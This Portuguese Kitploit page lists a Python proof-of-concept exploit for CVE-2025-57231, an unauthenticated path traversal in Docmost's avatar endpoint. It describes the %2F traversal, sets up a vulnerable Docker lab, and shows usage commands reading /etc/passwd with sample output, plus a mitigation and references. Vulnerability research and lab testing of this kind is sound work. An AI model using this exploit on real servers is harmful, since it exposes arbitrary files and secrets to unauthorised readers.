Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57231 — PoC de exploit em Python para CVE-2025-57231, uma path traversal não autenticada no Docmost < 0.22.0 que lê arquivos arbitrários através do endpoint de avatar. | Kitploit
Ferramentas/GitHubGitHub/anirbala98/cve-2025-57231
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubanirbala98/cve-2025-57231

CVE-2025-57231

PoC de exploit em Python para CVE-2025-57231, uma path traversal não autenticada no Docmost < 0.22.0 que lê arquivos arbitrários através do endpoint de avatar.

Ver Repositório
1há 4h 20mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-57231 - Docmost < 0.22.0 - Leitura Arbitrária de Arquivos

Este repositório contém um exploit Proof of Concept (PoC) para CVE-2025-57231.

Aviso Legal

Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou não tem permissão para testar.

Visão Geral

Uma vulnerabilidade de directory traversal no Docmost permite leitura arbitrária de arquivos da versão 0.2.1 até 0.21.0. O endpoint /api/attachments/img/avatar da aplicação não valida corretamente os caminhos de arquivo e é acessível publicamente sem qualquer autenticação. Isso permite que atacantes não autenticados recuperem conteúdos arbitrários de arquivos do alvo ao sondar o endpoint /avatar com sequências %2F.

Versão Afetada

Todas as versões do Docmost de 0.2.1 até 0.21.0 são afetadas.

Requisitos

  • Python 3.13.14
  • Requests 2.32.5

Configuração do ambiente vulnerável

Pré-requisitos: Docker e Docker compose instalados

  1. Crie um diretório home e baixe o arquivo docker-compose
root@kitploit:~
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
  1. Edite o arquivo docker-compose.yml
root@kitploit:~
# Generate a long random secret key
openssl rand -hex 32

# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above 
  1. Inicie o container
root@kitploit:~
sudo docker-compose up -d
  1. Insira os detalhes do Workspace

Navegue até http://localhost:3000/ e insira detalhes fictícios para nome do workspace, nome, email e senha

Instalação do exploit

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2025-57231.git
cd CVE-2025-57231/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -f <file location>
python exploit.py http://localhost:3000/ -f /etc/passwd

Exemplo

root@kitploit:~
└─$ python exploit.py http://localhost:3000/ -f /etc/passwd
[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

Mitigação

Atualize o plugin para a versão 0.22.0.

Referências

  • https://github.com/advisories/GHSA-59m3-fj8c-996g
  • https://nvd.nist.gov/vuln/detail/CVE-2025-57231
  • https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal
Baixar ferramenta